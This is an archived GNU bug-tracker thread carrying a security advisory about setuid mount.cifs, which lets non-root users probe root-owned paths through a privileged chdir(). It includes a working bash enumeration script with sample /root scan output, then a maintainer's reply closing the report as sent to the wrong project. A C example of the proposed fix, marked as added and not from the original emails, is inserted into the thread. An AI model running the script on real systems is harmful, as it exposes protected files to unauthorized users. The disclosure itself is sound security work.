GNU bug report logs - #10965
mount.cifs vulnerability


Package: coreutils;

Reported by: Jesus Olmos <jesus.olmos <at> blueliv.com>

Date: Wed, 7 Mar 2012 18:40:02 UTC

Severity: normal

Tags: notabug

Done: Eric Blake <eblake <at> redhat.com>

Bug is archived. No further changes may be made.


From: help-debbugs <at> gnu.org (GNU bug Tracking System)
To: Eric Blake <eblake <at> redhat.com>
Cc: tracker <at> debbugs.gnu.org
Subject: bug#10965: closed (mount.cifs vulnerability)
Date: Wed, 07 Mar 2012 18:48:02 +0000
[Message part 1 (text/plain, inline)]
Your message dated Wed, 07 Mar 2012 11:45:54 -0700
with message-id <4F57ACE2.4070703 <at> redhat.com>
and subject line Re: bug#10965: mount.cifs vulnerability
has caused the debbugs.gnu.org bug report #10965,
regarding mount.cifs vulnerability
to be marked as done.

(If you believe you have received this mail in error, please contact
help-debbugs <at> gnu.org.)


-- 
10965: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=10965
GNU Bug Tracking System
Contact help-debbugs <at> gnu.org with problems
[Message part 2 (message/rfc822, inline)]
From: Jesus Olmos <jesus.olmos <at> blueliv.com>
To: bug-coreutils <at> gnu.org
Subject: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 19:33:49 +0100
Hello, here is a bug report for mount.cifs. It is a little security breach
on Linux permissions by controlling a privileged chdir().

regards.



########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################

1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir(); this leads to arbitrary file
identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the Linux base system, and is setuid on
most distributions.

This software mounts CIFS partitions to directories authorized in fstab.


3. DESCRIPTION
-------------------------
Although there are no authorized CIFS mounts, it is possible, via the second
parameter, to control a privileged chdir() syscall and infer its return value
through the responses.

This implies a little security breach of Linux permissions: a non-root user
can enumerate files and directories as root.

This can help to exploit other vulnerabilities: enumerate /root/ contents,
descriptors used by any process, user homes, etc.

One of the attack vectors is a /root/ directory scan:

[sha0 <at> spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

It also allows enumerating sub-sub-directories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos <at> blueliv.com
# discover root protected files & directories, user homes, process descriptors, ...

path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached.

This method of transferring files is highly dangerous and can rely on a
remote control of the server.

6. SYSTEMS AFFECTED
-------------------------
All versions are affected.

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV

10. DISCLOSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



-- 
Jesus Olmos
jesus.olmos <at> blueliv.com

Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
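The fix the advisory's SOLUTION section asks for, shown as an added example that is not mount.cifs source and not the reporter's code. It assumes a constructed allow-list standing in for the fstab "user" entries and a hypothetical prepare_mountpoint() entry point. Beyond the advisory's proposed reordering (authorize first, chdir() second), it also performs the chdir() with the caller's real uid, so that even an authorized path can only produce errors the caller could have obtained without the setuid helper; in a run that is not setuid, the seteuid() calls are no-ops.

```c
/* Added example (not mount.cifs source, not the reporter's code):
 * authorization before any privileged path access, and the path access
 * itself done with the caller's own uid so chdir() cannot act as an oracle. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Outcomes reported to the user. Hypothetical names for this example. */
enum mp_status {
    MP_OK = 0,
    MP_NOT_AUTHORIZED, /* refused before the filesystem is touched at all */
    MP_ENOENT,
    MP_ENOTDIR,
    MP_EACCES,
    MP_PRIV,           /* could not drop or regain credentials */
    MP_OTHER
};

/* Constructed allow-list standing in for the "user" entries of /etc/fstab.
 * "/dev/null" is listed only so the ENOTDIR outcome can be exercised. */
static const char *const example_fstab[] = {
    "/",
    "/dev/null",
    "/nonexistent-mountpoint",
};
#define EXAMPLE_FSTAB_N (sizeof example_fstab / sizeof example_fstab[0])

/* Exact-match lookup; a real implementation parses fstab here. */
static int mountpoint_authorized(const char *path,
                                 const char *const *allowed, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(path, allowed[i]) == 0)
            return 1;
    return 0;
}

/* chdir() with the caller's real uid, then regain the saved effective uid.
 * Returns 0, the (positive) errno from chdir(), or -1 on a credential failure. */
static int chdir_as_caller(const char *path)
{
    uid_t saved_euid = geteuid();
    int rc = 0;

    if (seteuid(getuid()) != 0)
        return -1;
    if (chdir(path) != 0)
        rc = errno;
    if (seteuid(saved_euid) != 0)
        return -1; /* a setuid helper must abort here, not carry on */
    return rc;
}

enum mp_status prepare_mountpoint(const char *path,
                                  const char *const *allowed, size_t n)
{
    /* Order matters: an unlisted path never reaches chdir(), so its
     * existence or type is never revealed by the error message. */
    if (!mountpoint_authorized(path, allowed, n))
        return MP_NOT_AUTHORIZED;

    switch (chdir_as_caller(path)) {
    case 0:       return MP_OK;
    case -1:      return MP_PRIV;
    case ENOENT:  return MP_ENOENT;
    case ENOTDIR: return MP_ENOTDIR;
    case EACCES:  return MP_EACCES;
    default:      return MP_OTHER;
    }
}

/* Convenience wrapper over the constructed table. */
enum mp_status prepare_example(const char *path)
{
    return prepare_mountpoint(path, example_fstab, EXAMPLE_FSTAB_N);
}

static const char *status_name(enum mp_status s)
{
    static const char *const names[] = {
        "ok", "not authorized in fstab", "no such file or directory",
        "not a directory", "permission denied", "credential switch failed",
        "other error"
    };
    return names[s];
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/root/secret";
    printf("%s: %s\n", path, status_name(prepare_example(path)));
    return 0;
}
```

With this ordering, the wordlist loop from the proof of concept gets the same "not authorized" answer for every candidate name, because the allow-list check rejects the path before any syscall sees it; the uid drop is a second, independent layer for the case where the allow-list is wider than intended.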



[Message part 3 (message/rfc822, inline)]
From: Eric Blake <eblake <at> redhat.com>
To: Jesus Olmos <jesus.olmos <at> blueliv.com>
Cc: 10965-done <at> debbugs.gnu.org
Subject: Re: bug#10965: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 11:45:54 -0700
[Message part 4 (text/plain, inline)]
tag 10965 notabug
thanks

On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs. It is a little security breach
> on Linux permissions by controlling a privileged chdir().

Thanks for the report, but you have sent it to the wrong list.  GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything.  I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.

-- 
Eric Blake   eblake <at> redhat.com    +1-919-301-3266
Libvirt virtualization library http://libvirt.org

[signature.asc (application/pgp-signature, attachment)]
